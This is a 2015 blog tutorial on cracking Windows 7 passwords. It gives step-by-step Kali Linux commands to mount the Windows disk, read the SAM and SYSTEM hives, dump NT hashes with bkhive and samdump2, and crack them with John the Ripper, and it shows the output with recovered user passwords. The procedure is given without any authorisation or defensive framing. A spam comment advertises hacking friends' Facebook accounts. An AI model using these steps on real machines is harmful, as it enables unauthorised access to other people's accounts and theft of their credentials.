Wednesday, 6 May 2015

Crack Windows 7 passwords using Kali Linux

In this tutorial, we will use 'bkhive','samdump2', and 'John the Ripper' in Kali Linux to crack Windows 7 passwords.

For this tutorial, you need
a) Kali Linux LiveDVD
b) A Windows 7 machine

Perform the following steps:

1) Boot the machine using Kali Linux LiveDVD

2) Open the terminal window, and view the list of partitions on disk
root@kali:~# lsblk

3) Mount the Windows partition
root@kali:~# mount /dev/sda2 /mnt

4) Traverse to the SAM database directory.
root@kali:~# cd /mnt/Windows/System32/config

5) View 'SYSTEM' file in 'config' directory.
root@kali:/mnt/Windows/System32/config# ls

6) Dump the syskey bootkey from Windows System Hive 
root@kali:/mnt/Windows/System32/config# bkhive SYSTEM hive.txt
bkhive 1.1.1 by Objectif Securite
original author:

Root Key : CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: 001
Bootkey: 9055be7eb881423834eda4a7427acbe0

7) Dump the Windows password hashes.
root@kali:/mnt/Windows/System32/config# samdump2 SAM hive.txt > hash.txt
samdump2 1.1.1 by Objectif Securite
original author:

Root Key : CMI-CreateHive{899121E8-11D8-44B6-ACEB-301713D5ED8C}

8) View the hash file
root@kali:/mnt/Windows/System32/config# cat hash.txt

9) Crack password hashes using John the Ripper
root@kali:/mnt/Windows/System32/config# john --format=nt2 hash.txt
Created directory: /root/.john

Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 intrinsics 12x])
shabbir          (shabbir)
admin            (Ali)
welcome          (Batul)
guesses: 5  time: 0:00:00:00 DONE (Thu May  7 00:05:01 2015)  c/s: 59142  trying: please - zephyr


  1. Replies
    1. Nice post! amazing your posts. I hope you can post more helpful articles. I found a website that we can hack any our friends facebook account within minutes. Check out below link:

  2. This comment has been removed by the author.

  3. This comment has been removed by the author.

  4. This comment has been removed by the author.